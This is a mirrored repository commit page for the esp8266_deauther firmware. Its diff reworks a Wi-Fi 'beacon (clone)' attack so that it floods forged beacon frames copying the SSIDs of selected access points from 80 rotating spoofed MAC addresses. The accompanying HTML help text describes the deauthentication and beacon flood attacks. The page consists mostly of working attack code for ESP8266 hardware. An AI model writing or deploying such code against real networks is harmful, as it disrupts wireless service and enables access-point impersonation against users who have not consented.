gitea-mirror/esp8266_deauther
1
0
Fork 0
mirror of https://github.com/SpacehuhnTech/esp8266_deauther.git synced 2025-12-23 15:38:18 -08:00
Code Issues Packages Projects Releases Wiki Activity

Improved beacon attack

Browse Source 
Both attacks should work now
This commit is contained in:
Stefan Kremser
2017-02-24 13:34:20 +01:00
parent 0f3742b6bf
commit a791101d32
5 changed files with 63 additions and 41 deletions
Download Patch File Download Diff File Expand all files Collapse all files

72
esp8266_deauther/Attack.cpp
View File

@@ -5,12 +5,12 @@ Attack::Attack(){
}
void Attack::generate(){
Attack::stopAll();
if(debug) Serial.print("generating Macs");
Mac _randomBeaconMac;
uint8_t _randomMacBuffer[6];
beaconAdrs._clear();
do{
getRandomVendorMac(_randomMacBuffer);
for(int i=0;i<6;i++) _randomBeaconMac.setAt(_randomMacBuffer[i],i);
@@ -143,42 +143,64 @@ void Attack::run(){
if(debug) Serial.println(" done ");
}
if(isRunning[1] && currentMillis-prevTime[1] >= 1000){
if(isRunning[1] && currentMillis-prevTime[1] >= 100){
if(debug) Serial.print("running "+(String)attackNames[1]+" attack");
for(int a=0;a<apScan.results;a++){
if(apScan.isSelected(a)){
String _ssid = apScan.getAPName(a);
int _ssidLen = _ssid.length();
int _restSSIDLen = 32 - _ssidLen;
int _ch = apScan.getAPChannel(a);
Mac _broadcast;
_broadcast.set(0xFF,0xFF,0xFF,0xFF,0xFF,0xFF);
wifi_set_channel(_ch);
int _selectedClients = 0;
for(int i=0;i<clientScan.results;i++){
if(clientScan.getClientSelected(i)){
_selectedClients++;
buildBeacon(beaconAdrs._get(0),clientScan.getClientMac(i),_ssid+" 2",_ch,false);
for(int h=0;h<packetRate;h++) if(send()) packetsCounter[1]++;
for(int c=0;c<macListLen;c++){
String _apName = _ssid;
if(c < _restSSIDLen) for(int d=0; d < _restSSIDLen-c; d++) _apName += " ";//e.g. "SAMPLEAP "
else if(c < _restSSIDLen*2){
_apName = "."+_apName;
for(int d=0;d<(_restSSIDLen-1)-c/2;d++) _apName += " ";//e.g. ".SAMPLEAP "
} else{
for(int d=0; d < _restSSIDLen-2; d++) _apName += " ";
_apName += (String)c;//e.g. "SAMPLEAP 78"
}
//build a broadcast packet for this AP & SSID
buildBeacon(beaconAdrs._get(c),_broadcast,_apName,_ch,apScan.getAPEncryption(a) != "none");
for(int b=0;b<clientScan.results;b++){
if(clientScan.getClientSelected(b)){
_selectedClients++;
//change packet to adress only the selected client
for(int i=0;i<6;i++) packet[4+i] = clientScan.getClientMac(b)._get(i);
if(send()) packetsCounter[1]++;
}
}
//if no clients are selected send the broadcast packet
if(_selectedClients == 0) if(send()) packetsCounter[1]++;
}
if(_selectedClients == 0){
Mac _client;
_client.set(0xFF,0xFF,0xFF,0xFF,0xFF,0xFF);
buildBeacon(beaconAdrs._get(0),_client,_ssid+" 2",_ch,false);
for(int h=0;h<packetRate;h++) if(send()) packetsCounter[1]++;
}
}
}
}
prevTime[1] = millis();
stati[1] = (String)packetsCounter[1]+"pkts/s";
stati[1] = (String)(packetsCounter[1]*10)+"pkts/s";
packetsCounter[1] = 0;
macListChangeCounter++;
if(macListChangeCounter*10 >= macListInterval){
generate();
macListChangeCounter = 0;
}
if(debug) Serial.println(" done ");
}
@@ -203,12 +225,10 @@ void Attack::start(int num){
}
void Attack::stop(int num){
if(isRunning[num]){
isRunning[num] = false;
stati[num] = "ready";
prevTime[num] = millis();
if(debug) Serial.println("stopping "+(String)attackNames[num]+" attack");
}
if(isRunning[num] && debug) Serial.println("stopping "+(String)attackNames[num]+" attack");
isRunning[num] = false;
stati[num] = "ready";
prevTime[num] = millis();
}
void Attack::stopAll(){

12
esp8266_deauther/Attack.h
View File

@@ -12,7 +12,9 @@ extern "C" {
#include "APScan.h"
#include "ClientScan.h"
#define attacksNum 3
#define attacksNum 2
#define macListLen 80
#define macListInterval 5
extern void PrintHex8(uint8_t *data, uint8_t length);
extern void getRandomVendorMac(uint8_t *buf);
@@ -39,13 +41,13 @@ class Attack
bool send();
//attack declarations
const String attackNames[attacksNum] = {"deauth","beacon (clone)","beacon (list)"};
const String attackNames[attacksNum] = {"deauth","beacon (clone)"/*,"beacon (list)"*/};
//attack infos
String stati[attacksNum];
unsigned int packetsCounter[attacksNum];
bool isRunning[attacksNum];
const int packetRate = 10 ;
int packetRate = 10;
MacList beaconAdrs;
@@ -75,7 +77,7 @@ class Attack
/* 16 - 21 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, //source
/* 22 - 23 */ 0xc0, 0x6c,
/* 24 - 31 */ 0x83, 0x51, 0xf7, 0x8f, 0x0f, 0x00, 0x00, 0x00,
/* 32 - 33 */ 0xe8, 0x03, //0x64,0x00 => every 100ms
/* 32 - 33 */ 0x64, 0x00, //0x64, 0x00 => every 100ms - 0xe8, 0x03 => every 1s
/* 34 - 35 */ 0x01, 0x04
/*,0x00, 0x06, //SSID size
0x72, 0x72, 0x72, 0x72, 0x72, 0x72, //SSID
@@ -100,6 +102,8 @@ class Attack
0x00, 0x0f, 0xac, 0x02, //PSK
0x00, 0x00 //RSN capabilities
};
int macListChangeCounter = 0;
};
#endif

2
esp8266_deauther/data.h
View File

File diff suppressed because one or more lines are too long

3
esp8266_deauther/esp8266_deauther.ino
View File

@@ -57,13 +57,14 @@ void setup(){
delay(2000);
nameList.begin();
//nameList.clear();
//nameList.clear(); //usefull for debugging the NameList class
nameList.load();
Serial.println("");
Serial.println("starting...");
startWifi();
attack.stopAll();
attack.generate();
/* ========== Web Server ========== */

15
htmlfiles/attack.html
View File

@@ -37,17 +37,14 @@
<p class="small">
<br>
<b>deauth selected:</b><br>
sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi network.
<b>deauth [deauthentication attack]:</b><br>
Sends deauthentication frames and dissociation frames to the selected client(s) in the selected WiFi access point(s).
<br><br>
<b>deauth all:</b><br>
sends deauthentication frames and dissociation frames as broadcast to all clients in the selected WiFi network.
<b>beacon [beacon flood attack]:</b><br>
Sends beacon frames to the selected client(s) with the same SSID as the selected WiFi access point(s).
<br><br>
<b>beacon spam:</b><br>
sends beacon frames with the same SSID as the selected WiFi access point.
<br><br>
<b>random beacon spam:</b><br>
sends beacon frames with a random SSID .
<b>Note:</b><br>
If no client is selected, the packets are sent as broadcast!
<br>
</p>